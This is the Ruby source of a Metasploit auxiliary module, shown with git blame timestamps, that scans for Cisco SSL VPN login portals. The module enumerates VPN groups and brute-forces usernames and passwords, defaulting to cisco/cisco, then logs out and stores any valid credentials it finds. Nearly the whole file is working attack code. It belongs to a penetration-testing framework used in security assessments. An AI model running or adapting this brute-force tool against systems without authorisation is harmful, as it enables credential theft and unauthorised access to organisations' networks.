metasploit-framework/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb

247 lines
6.3 KiB
Ruby
Raw Normal View History

2014-04-17 02:47:58 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
2014-04-17 02:47:58 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
2017-07-14 07:46:59 +00:00
class MetasploitModule < Msf::Auxiliary
2014-04-17 02:47:58 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco SSL VPN Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco SSL VPN web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
2014-06-12 16:22:43 +00:00
'Jonathan Claudius <jclaudius[at]trustwave.com>'
2014-04-17 02:47:58 +00:00
],
2014-06-12 16:22:43 +00:00
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'SSL' => true,
'USERNAME' => 'cisco',
'PASSWORD' => 'cisco'
}
2014-04-17 02:47:58 +00:00
))
register_options(
[
Opt::RPORT(443),
OptString.new('GROUP', [false, "A specific VPN group to use", ''])
])
2014-04-17 02:47:58 +00:00
end
def run_host(ip)
unless check_conn?
2016-02-01 22:06:34 +00:00
vprint_error("Connection failed, Aborting...")
2014-04-23 01:48:16 +00:00
return false
2014-04-17 02:47:58 +00:00
end
unless is_app_ssl_vpn?
2016-02-01 22:06:34 +00:00
vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.")
2014-04-23 01:48:16 +00:00
return false
2014-04-17 02:47:58 +00:00
end
2016-02-01 22:06:34 +00:00
vprint_good("Application appears to be Cisco SSL VPN. Module will continue.")
2014-04-17 02:47:58 +00:00
groups = Set.new
if datastore['GROUP'].empty?
2016-02-01 22:06:34 +00:00
vprint_status("Attempt to Enumerate VPN Groups...")
2014-04-17 02:47:58 +00:00
groups = enumerate_vpn_groups
2014-04-23 02:07:25 +00:00
2014-04-23 01:45:04 +00:00
if groups.empty?
2016-02-01 22:06:34 +00:00
vprint_warning("Unable to enumerate groups")
vprint_warning("Using the default group: DefaultWEBVPNGroup")
2014-04-23 01:45:04 +00:00
groups << "DefaultWEBVPNGroup"
else
2016-02-01 22:06:34 +00:00
vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}")
2014-04-23 01:45:04 +00:00
end
2014-04-17 02:47:58 +00:00
else
groups << datastore['GROUP']
end
groups << ""
2014-04-23 02:07:25 +00:00
2016-02-01 22:06:34 +00:00
vprint_status("Starting login brute force...")
2014-04-17 02:47:58 +00:00
groups.each do |group|
each_user_pass do |user, pass|
do_login(user, pass, group)
end
end
end
# Verify whether the connection is working or not
def check_conn?
begin
2014-04-23 01:58:14 +00:00
res = send_request_cgi('uri' => '/', 'method' => 'GET')
2016-12-01 03:03:29 +00:00
if res
vprint_good("Server is responsive...")
return true
end
2014-04-23 01:58:14 +00:00
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
2014-04-17 02:47:58 +00:00
end
2016-12-01 03:03:29 +00:00
false
2014-04-17 02:47:58 +00:00
end
def enumerate_vpn_groups
2014-04-23 01:58:14 +00:00
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
2014-04-17 02:47:58 +00:00
2014-04-18 00:24:19 +00:00
if res &&
res.code == 302
2014-04-23 01:58:14 +00:00
res = send_request_cgi(
2014-04-23 02:07:25 +00:00
'uri' => '/+CSCOE+/logon.html',
2014-04-23 01:58:14 +00:00
'method' => 'GET',
2014-04-23 02:07:25 +00:00
'vars_get' => { 'fcadbadd' => "1" }
2014-04-23 01:58:14 +00:00
)
2014-04-18 00:24:19 +00:00
end
2014-04-17 02:47:58 +00:00
groups = Set.new
2014-04-18 00:24:19 +00:00
group_name_regex = /<select id="group_list" name="group_list" style="z-index:1(?:; float:left;)?" onchange="updateLogonForm\(this\.value,{(.*)}/
2014-04-17 02:47:58 +00:00
if res &&
match = res.body.match(group_name_regex)
group_string = match[1]
2014-04-23 01:34:08 +00:00
groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set
2014-04-17 02:47:58 +00:00
end
return groups
end
# Verify whether we're working with SSL VPN or not
2014-04-23 02:07:25 +00:00
def is_app_ssl_vpn?
2014-04-23 01:58:14 +00:00
res = send_request_cgi(
'uri' => '/+CSCOE+/logon.html',
'method' => 'GET',
)
2014-04-17 02:47:58 +00:00
2014-04-18 00:24:19 +00:00
if res &&
res.code == 302
2014-04-23 01:58:14 +00:00
res = send_request_cgi(
2014-04-23 02:07:25 +00:00
'uri' => '/+CSCOE+/logon.html',
2014-04-23 01:58:14 +00:00
'method' => 'GET',
2014-04-23 02:07:25 +00:00
'vars_get' => { 'fcadbadd' => "1" }
2014-04-23 01:58:14 +00:00
)
2014-04-18 00:24:19 +00:00
end
2014-04-17 02:47:58 +00:00
if res &&
res.code == 200 &&
2014-04-18 00:24:19 +00:00
res.body.match(/webvpnlogin/)
2014-04-17 02:47:58 +00:00
return true
else
return false
end
end
def do_logout(cookie)
2014-04-23 01:58:14 +00:00
res = send_request_cgi(
'uri' => '/+webvpn+/webvpn_logout.html',
'method' => 'GET',
'cookie' => cookie
)
2014-04-17 02:47:58 +00:00
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'Cisco SSL VPN',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
2014-04-17 02:47:58 +00:00
# Brute-force the login page
def do_login(user, pass, group)
2016-02-01 22:06:34 +00:00
vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}")
2014-04-17 02:47:58 +00:00
begin
2014-04-23 02:07:25 +00:00
cookie = "webvpn=; " +
"webvpnc=; " +
"webvpn_portal=; " +
"webvpnSharePoint=; " +
2014-04-17 02:47:58 +00:00
"webvpnlogin=1; " +
"webvpnLang=en;"
post_params = {
'tgroup' => '',
'next' => '',
'tgcookieset' => '',
'username' => user,
'password' => pass,
'Login' => 'Logon'
}
post_params['group_list'] = group unless group.empty?
2016-02-09 23:12:09 +00:00
res = send_request_cgi(
'uri' => '/+webvpn+/index.html',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => post_params
)
if res &&
res.code == 200 &&
res.body.match(/SSL VPN Service/) &&
res.body.match(/webvpn_logout/i)
2014-04-17 02:47:58 +00:00
2016-02-01 22:06:34 +00:00
print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
2014-04-17 02:47:58 +00:00
2016-02-09 23:12:09 +00:00
do_logout(res.get_cookies)
2014-04-17 02:47:58 +00:00
2016-02-09 23:12:09 +00:00
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
2015-06-19 20:38:26 +00:00
report_note(ip: rhost, type: 'cisco.cred.group', data: "User: #{user} / Group: #{group}")
2014-04-17 02:47:58 +00:00
return :next_user
else
2016-02-01 22:06:34 +00:00
vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}")
2014-04-17 02:47:58 +00:00
end
2014-04-23 01:58:14 +00:00
rescue ::Rex::ConnectionRefused,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionError,
::Errno::EPIPE
2016-02-01 22:06:34 +00:00
vprint_error("HTTP Connection Failed, Aborting")
2014-04-17 02:47:58 +00:00
return :abort
end
end
end